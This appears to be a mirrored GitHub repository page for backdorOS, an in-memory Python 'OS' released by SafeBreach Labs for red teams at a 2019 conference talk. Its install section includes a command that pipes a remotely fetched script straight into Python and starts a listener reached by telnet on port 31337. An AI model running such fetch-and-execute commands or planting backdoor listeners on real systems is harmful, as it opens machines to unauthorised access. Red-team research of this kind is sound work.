SafeBreach-Labs / backdoros

backdorOS is an in-memory OS written in Python 2.7 with a built-in in-memory filesystem, hooks for open() calls and imports, Python REPL etc.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

backdorOS

backdorOS is an in-memory OS written in Python 2.7 with a built-in in-memory filesystem, hooks for open() calls and imports, Python REPL etc.

Install

$ git clone https://github.com/SafeBreach-Labs/backdoros
$ cd backdoros
$ ./backdoros.py &
$ telnet localhost 31337

OR

$ curl -fsSL http://URL/backdoros.py | python &
$ telnet localhost 31337

backdorOS was released as part of the BackdorOS: The In-memory OS for Red Teams talk given at Texas Cyber Summit 2019 conference by Itzik Kotler from SafeBreach Labs.

Slides

Click here to download

Version

0.1.0

License

BSD 3-Clause

About

backdorOS is an in-memory OS written in Python 2.7 with a built-in in-memory filesystem, hooks for open() calls and imports, Python REPL etc.

License:BSD 3-Clause "New" or "Revised" License


Languages

Language:Python 100.0%